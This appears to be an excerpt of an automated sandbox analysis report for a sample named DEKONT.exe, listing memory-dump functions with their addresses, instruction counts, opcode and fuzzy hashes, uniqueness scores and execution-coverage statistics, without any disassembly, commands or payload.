Instruction ID: 99db6f67f172540fbaeb1868a41fcce8fb741299d9491fd5fef419a6483011ef
Opcode Fuzzy Hash: f45c17d1105080059c8a2cfb309fd2c5b1d0145b5719700544eb4039687dbf1c
Instruction Fuzzy Hash: 03E1F9B4E002198FDB24CFA9C580AAEFBF6FF89315F248159D418AB356D734A941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 07ABACD8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1c53aad83db9b358fb392e402efe2011396933a0bc6462615d44a940cc14784
Instruction ID: 8fdbe127f715dc02f0f73e4c5cab341478a17563fbff6f3c613403d08c8f0241
Opcode Fuzzy Hash: e1c53aad83db9b358fb392e402efe2011396933a0bc6462615d44a940cc14784
Instruction Fuzzy Hash: A5E1DAB4E002198FDB24CFA9C580AAEBBF6FF89305F248159D418A7356D731AD81CF61

Uniqueness

Uniqueness Score: -1.00%

Function 07ABCBF0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f240ec88c54ba4dd88661831aa2d6c6720bfd75af787b0d20f1587cdc125b29a
Instruction ID: 432c0690a4d91b7d611fab0a0dddc49987e55549f302066b75c6d2634206634a
Opcode Fuzzy Hash: f240ec88c54ba4dd88661831aa2d6c6720bfd75af787b0d20f1587cdc125b29a
Instruction Fuzzy Hash: 03E10BB4E002198FDB24CFA9C5809AEBBF6FF89315F248169D419A7356D730AD41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 07AB2A6F Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b465967e34a9b9ae15618ff64a431274c7d7f838c0927f360f91fd3e4e893ac2
Instruction ID: 80c80a34eaee18774e58d8c40bdb04cef2fbf719fa7b5c2c885c2911cea93e2b
Opcode Fuzzy Hash: b465967e34a9b9ae15618ff64a431274c7d7f838c0927f360f91fd3e4e893ac2
Instruction Fuzzy Hash: FFD1173192071A8ADB01EBA8D990A9DB7B1FFD5300F50C79AE40937214EF70AAD5CF91

Uniqueness

Uniqueness Score: -1.00%

Function 017FDFE4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1372857609.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17f0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55440b2ccaf940acce179dd18efad2ce7e29de79cf0fd0d699bf427b84e08b0f
Instruction ID: 004c38d3c0559bf0dcbf7eeb08f73c61bd829f52abbf605e19eca07e9921857c
Opcode Fuzzy Hash: 55440b2ccaf940acce179dd18efad2ce7e29de79cf0fd0d699bf427b84e08b0f
Instruction Fuzzy Hash: F3A14B32A0021A9FCF15DFB4C88459EFBB2FF84300B25456AEA05AB365DF71E955CB50

Uniqueness

Uniqueness Score: -1.00%

Function 07AB2A80 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b401a1dc16e2ca85097d100cd706a3fe498530009689c52fe45ed81d3b590aef
Instruction ID: 268abfe3f10fc5c3404aa987c53e8408dc863b23255d2b6a10c8fb321a454af8
Opcode Fuzzy Hash: b401a1dc16e2ca85097d100cd706a3fe498530009689c52fe45ed81d3b590aef
Instruction Fuzzy Hash: F8D1163192071A8ADB01EBA8D990A9DB7B1FFD5300F50C79AE40937214EF70AAD5CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05970589 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebb41ab455d645ac1f2f53789860d9e74e916e19c4d2d299b32d3f97918ed5d9
Instruction ID: 87ab772a2c81e0a4098d8c56a316fb4eeed3349043ea2910689b50fa989dd1a6
Opcode Fuzzy Hash: ebb41ab455d645ac1f2f53789860d9e74e916e19c4d2d299b32d3f97918ed5d9
Instruction Fuzzy Hash: 40C11BB1401755CBF720EFA4E8D818A7BB9BB8672CF504309D2616F2D8DBB4945ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 07AB1139 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a0b477a09d5738516135f5d6a2bf1c7e60219f695967000ac19787f00593ed8
Instruction ID: 8ab0de0f7e9a7363a1486c05b6289a156cce813ef304dfc41f29da460d4d1452
Opcode Fuzzy Hash: 6a0b477a09d5738516135f5d6a2bf1c7e60219f695967000ac19787f00593ed8
Instruction Fuzzy Hash: ED513BB0E1120EDBCB14CFE6E4516EEBBF6EF89210F10942AE425E7354E7345A028F94

Uniqueness

Uniqueness Score: -1.00%

Function 07AB1148 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05d775d4530282b63eb222cab2b9c7532dd400df561e7e44c68f918402448564
Instruction ID: 6979a1527b82697c052387d4a8d37c1c5d390d718bded9fce0add175ad426af2
Opcode Fuzzy Hash: 05d775d4530282b63eb222cab2b9c7532dd400df561e7e44c68f918402448564
Instruction Fuzzy Hash: 585139B0E1120EDBCB14CFA6E4555EEBBF6EF89210F10942AE025A7254E7345A028F94

Uniqueness

Uniqueness Score: -1.00%

Function 07ABC7A8 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e160d6d0973ad564e9163db19f31552a3fc8ecf13d3c83ca86cbe22877272be7
Instruction ID: f533627cc3efe8694d9626d0106e4e6a5ba76e4d3b21440b1d258f02255c6e94
Opcode Fuzzy Hash: e160d6d0973ad564e9163db19f31552a3fc8ecf13d3c83ca86cbe22877272be7
Instruction Fuzzy Hash: 4C51ECB1E002198FDB24CFAAC5809EEBBF6FF89215F148169D418A7316D7355941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05972E08 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89d52f85a5cce643ac4c8d9b35ed71ba127b1239338ead7ea5ef659e272e7bdc
Instruction ID: a9c382d8cc6f4445f1b445eda01cdfc460936623438c313832e166eadc5a647f
Opcode Fuzzy Hash: 89d52f85a5cce643ac4c8d9b35ed71ba127b1239338ead7ea5ef659e272e7bdc
Instruction Fuzzy Hash: E331A8B9D012189FCB14CFA9D984A9EFBF5BB49310F24942AE808B7310D735AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 05972E10 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b5f93939fdd0e7f654d74bb82a950d5c98bbdd5d8d28229a7ef30d39d48d553
Instruction ID: 0116a4d6424ad077ddaaa0e4eb021d0bdeaa97d76d6399152a6b942b84e13130
Opcode Fuzzy Hash: 7b5f93939fdd0e7f654d74bb82a950d5c98bbdd5d8d28229a7ef30d39d48d553
Instruction Fuzzy Hash: 743197B8D012589FCB14CFA9D984A9EFBF5BF49310F24902AE818B7310D335AA45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 05972880 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1377879115.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5970000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd7b207fdd7dbec47b43bc4bf578d53f7fc6627400e95a54b238328177408989
Instruction ID: 61b6d0c17d43965e042e1159688d5ccffe6fc0694ef51432ff3e91653fc8a979
Opcode Fuzzy Hash: bd7b207fdd7dbec47b43bc4bf578d53f7fc6627400e95a54b238328177408989
Instruction Fuzzy Hash: F83186B8D012589FCB14CFA9E984A9EFBF1BF49310F24942AE819B7210D335AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 07AB1D6C Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c51295c0e065c81370a425ec5dc161f406863e200c8e1921adf6064153cc4dd
Instruction ID: 586a6794335739cb09e004d17432b4027c03f077d82a7856e9607dec3dc39316
Opcode Fuzzy Hash: 4c51295c0e065c81370a425ec5dc161f406863e200c8e1921adf6064153cc4dd
Instruction Fuzzy Hash: F2317EB8D05209EFCB14CFA9D584AEDBBF2BB89310F24912AE828B7350C3349941CF54

Uniqueness

Uniqueness Score: -1.00%

Function 07AB1D78 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b58962bbe7affd17fda833a7a66aac53894a9102aa16a0ca8b391d517d76ead
Instruction ID: 04724f0d5f1505798da2e175913bf1dcf45bc8321fcc507b428d16a1a6641192
Opcode Fuzzy Hash: 3b58962bbe7affd17fda833a7a66aac53894a9102aa16a0ca8b391d517d76ead
Instruction Fuzzy Hash: 7E315BB4D05209EFCB14CFA9D894AEDBBF6BB89310F24912AE824B7350D7349941CF54

Uniqueness

Uniqueness Score: -1.00%

Function 07AB2495 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2530721f1a8f9f2fa4cadd0017d195e89b5f0dd88d7ec4363591669e98fa57c0
Instruction ID: 4d29e0a991d716c0c167d737f2069a22166a98d51afcf3089e135ecc54932944
Opcode Fuzzy Hash: 2530721f1a8f9f2fa4cadd0017d195e89b5f0dd88d7ec4363591669e98fa57c0
Instruction Fuzzy Hash: E221A0B4D00209DFDB14CFAAD4946EEBBB1BB89310F20E52AE825B7290D7348545CF58

Uniqueness

Uniqueness Score: -1.00%

Function 07AB24A0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779a19a6c6d0b1d468452ccb01d33878f908f16d44602d73c888ab82c98ebccf
Instruction ID: 8d7058a14ae9b4327e62a4da0bfbc0149fed6806534bb8334540e44aa41e03ae
Opcode Fuzzy Hash: 779a19a6c6d0b1d468452ccb01d33878f908f16d44602d73c888ab82c98ebccf
Instruction Fuzzy Hash: 34219FB4D00209DFDB24CFAAD4846EEBBF5BB89310F10E12AE825B7290D7349945CF58

Uniqueness

Uniqueness Score: -1.00%

Function 07AB1FC5 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63844b3a0cfc0b1128c5bc76304018f09981f274532cde4e73587327403518db
Instruction ID: 948950c65c5bae92d84bbb8e5f965cff1219a305fc8b8efc320fc967bc8525d6
Opcode Fuzzy Hash: 63844b3a0cfc0b1128c5bc76304018f09981f274532cde4e73587327403518db
Instruction Fuzzy Hash: 66F07FB5E052099F8F04CFA9D4814EEFBF2BB5A310F10A16AE815B3314E7358941CF68

Uniqueness

Uniqueness Score: -1.00%

Function 07AB1FD0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
Instruction ID: cb3ee2193c3824a0808c5901599a82033cdd2bc226169379f9c7239e9b125e87
Opcode Fuzzy Hash: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
Instruction Fuzzy Hash: 26F03FB5D052089B8F04DFA9D5418EEFBF6AB5A310F10A16AE814B3310E73599518FA8

Uniqueness

Uniqueness Score: -1.00%

Function 07ABF1EC Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379348468.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ab0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d124d54709a0200fe324fa44f501502fd54105613a15863db6fdf20413fde435
Instruction ID: ed6ae6f2b73c0aee853fd55136cd34e9f423c2384705c165590a87f54776b2cf
Opcode Fuzzy Hash: d124d54709a0200fe324fa44f501502fd54105613a15863db6fdf20413fde435
Instruction Fuzzy Hash: 2DE030B4969108DFCB248F90E8456FCFBBCA78B311F043095D42E93112C7304A85CB00

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: DEKONT.exePID: 7564, Parent PID: 7384COMMON

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.6%
Total number of Nodes:	182
Total number of Limit Nodes:	20

Executed Functions

Function 05B289B0 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.3825646679.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b20000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d67916d8ecc99d8cc589bf02b2d350a4d6447cf98e8d314096acf4e51aacc006
Instruction ID: c9392fadfe7760ba0385755db7b350b456225eeb9a2e517a5be5f21f2be44e42
Opcode Fuzzy Hash: d67916d8ecc99d8cc589bf02b2d350a4d6447cf98e8d314096acf4e51aacc006
Instruction Fuzzy Hash: EEF1C674D01228DFDB14DFA9C884B9DBBB2FF48304F5481A9E408AB355DB75A986CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05B2BE28 Relevance: 1.6, APIs: 1, Instructions: 100
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05B2BE79

Memory Dump Source

Source File: 00000003.00000002.3825646679.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b20000_DEKONT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 01e259d5e6c4d96460441aecb28e2910c36468ea119e29dedab6ec178fe4c100
Instruction ID: b57be7aa9fec34e998459b55afcb6248972b58c04e2eba3e35a9d6b7b112eb83
Opcode Fuzzy Hash: 01e259d5e6c4d96460441aecb28e2910c36468ea119e29dedab6ec178fe4c100
Instruction Fuzzy Hash: 7E414AB0D042189BDB14CF99C584ADDFBB6FF88304F248169E4086B395CB31A986CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02DC98B8 Relevance: .9, Instructions: 856COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5a0f3a7d9ab67cf19ca49adf01f3f93bbc169cff39d522e446de3bd0ade65cb
Instruction ID: 6cf4bc6a172e4a6c912e6e7df010d0a8d23517e2b5e6e82b5d217ced7df63062
Opcode Fuzzy Hash: d5a0f3a7d9ab67cf19ca49adf01f3f93bbc169cff39d522e446de3bd0ade65cb
Instruction Fuzzy Hash: 0A72AE70A0021ADFCB15CFA8C994AAEBBF2FF88310F258559E8459B3A5D731ED51CB50

Uniqueness

Uniqueness Score: -1.00%

Function 06CE15F8 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef763b2313d77ff957b9df66849db1e9114bb6400b0b44f6352d2f2aa867483b
Instruction ID: 273a7e1c62694f0293dd0b45d773b4bd86b78884c19c2c8198fa236d49051dfa
Opcode Fuzzy Hash: ef763b2313d77ff957b9df66849db1e9114bb6400b0b44f6352d2f2aa867483b
Instruction Fuzzy Hash: BD827F74E01229CFDB65DF69C898BDDBBB2BB89300F1481EA940DA7261DB345E81CF41

Uniqueness

Uniqueness Score: -1.00%

Function 02DC6168 Relevance: .5, Instructions: 515COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8f70d3b07a72f7957853cb653bcd1e5f8ff04fe3e231d20fe23a09b451ccc56
Instruction ID: ee168c98b2a0807edaa2fb3e8fad002c6b45aa697f7558fccb9a6839c70d1539
Opcode Fuzzy Hash: c8f70d3b07a72f7957853cb653bcd1e5f8ff04fe3e231d20fe23a09b451ccc56
Instruction Fuzzy Hash: 7F126B70A0021A9FDB15DF69D894BAEBBB6BFC8300F24856DE5469B394DB34DC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02DCB388 Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f508244a8f1a5de8372520a84735a42f5417c37e21f7d211a84894c8a92f0d
Instruction ID: 131abd327a48c5c8c3025595a4ff03f1ef232e8399ee9def36a74bccd8022969
Opcode Fuzzy Hash: d8f508244a8f1a5de8372520a84735a42f5417c37e21f7d211a84894c8a92f0d
Instruction Fuzzy Hash: 3CE1EA75A04259CFDB14DFA9C985A9DBBB1FF58318F25806AE809AB361D730EC41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02DC68E0 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9156bc0fd106c982773c0b534a05c9840d6221825d4d8c39c3c0bd7f08f91487
Instruction ID: 359ff61e272b5f330b251a98744df09ddd57cb3b4eef66d0b6a75e8f1af4974c
Opcode Fuzzy Hash: 9156bc0fd106c982773c0b534a05c9840d6221825d4d8c39c3c0bd7f08f91487
Instruction Fuzzy Hash: 02D1EA71A0011ADFDB15CFA9CA84AADBBFAFF88344F258069E415AB365D730DD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06CE8A58 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5155c0e9ea90b7ae8bcbfdf3e24aed9bb50fc6eb1ff424a0fcec34ea6bf9df4b
Instruction ID: 8b5469d0c8c476f7b9b990fd818b18c94e2889a2c29f0a367ec4e6175dca5127
Opcode Fuzzy Hash: 5155c0e9ea90b7ae8bcbfdf3e24aed9bb50fc6eb1ff424a0fcec34ea6bf9df4b
Instruction Fuzzy Hash: 73E1AE74E01218CFEB64DFA5C894B9DBBB2BF88304F2081AAD409A7395DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CE7020 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ee3f15c6d02a478af2ece9fd61f8b647d0e8c9a5b3962911bff8a5c3220e9b9
Instruction ID: c70450953edf84e5d2732dc8b469697b7d849bf8b786ad39ddecdf96de9508db
Opcode Fuzzy Hash: 3ee3f15c6d02a478af2ece9fd61f8b647d0e8c9a5b3962911bff8a5c3220e9b9
Instruction Fuzzy Hash: 4CC19E74E00218CFDB54DFA5C994B9DBBB2FB88305F2080AAD809AB355DB356E85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CEDAC0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4637ca14caa268361c6a8b8fea6f7497c6ed5bb63e0c0afbf2655276fe12a90
Instruction ID: 3b58c8e57c7f75a477527f20e54c00323b210f122b59c54ee4c4f3e5d150660d
Opcode Fuzzy Hash: b4637ca14caa268361c6a8b8fea6f7497c6ed5bb63e0c0afbf2655276fe12a90
Instruction Fuzzy Hash: 98A1A175E016288FEB68CF6AC944B9DFBF2AF89300F14C0AAD40DA7254DB745A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CECE28 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5a5484b564d1ca0291752c9901817fdb57c2590877e672e73fdb59df6746b3b
Instruction ID: fb59f2b866334b2170da27ce7138310f8ed169a30404a90c7d98d8b33f2d69f0
Opcode Fuzzy Hash: c5a5484b564d1ca0291752c9901817fdb57c2590877e672e73fdb59df6746b3b
Instruction Fuzzy Hash: 7FA19175E016288FEB68CF6AD944B9DBBF2BF89300F14C0AAD40DA7255DB345A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CEC7D8 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8095ae7f92189ebce9c3e9b115337e8c84ab26fcbced9e03f8656202a590875f
Instruction ID: 18949e704eec4710b9f34bd4186b9671f8c67da1073f7e86cb347e3a01e545a7
Opcode Fuzzy Hash: 8095ae7f92189ebce9c3e9b115337e8c84ab26fcbced9e03f8656202a590875f
Instruction Fuzzy Hash: 18A192B5E016188FEB68CF6AC944B9DBBF2BF89300F14D0AAD40DA7255DB345A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06CEBB38 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2626b454c4920dd349a174839af947634ca325f974a3d3a569c55ef42163d87
Instruction ID: 90cc32a7ad57b6e7e03b29039203c74badb42f447fa54ed32b74f391f2404d55
Opcode Fuzzy Hash: a2626b454c4920dd349a174839af947634ca325f974a3d3a569c55ef42163d87
Instruction Fuzzy Hash: 25A1A075E016288FEB68CF6AC944B9DBBF2BF89300F14C0AAD40DA7254DB345A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06CEA858 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3bace165116b8ef86671331d6041358561ec6620631e30aa759a87771a45da6
Instruction ID: 2b36981bc6ff423f2246d4e782557054e762098e20fb9bef93e7cdde9859ae14
Opcode Fuzzy Hash: f3bace165116b8ef86671331d6041358561ec6620631e30aa759a87771a45da6
Instruction Fuzzy Hash: E6A18275E016288FEB68CF6AC944B9DBBF2BF89300F14C0AAD40DA7255DB345A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06CEC188 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df7b22861dd050b81d73ad12871a0b0b924f54a2c5a448da37eda9378a50fb5c
Instruction ID: 274249b52bae551076c998d5f4391696affb8d57ee6da223e4c9aff7d5bd6ddf
Opcode Fuzzy Hash: df7b22861dd050b81d73ad12871a0b0b924f54a2c5a448da37eda9378a50fb5c
Instruction Fuzzy Hash: BBA19375E016188FEB64CF6AC944B9DBBF2BF89300F14C0AAD40DA7255DB345A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 06CEAEA8 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

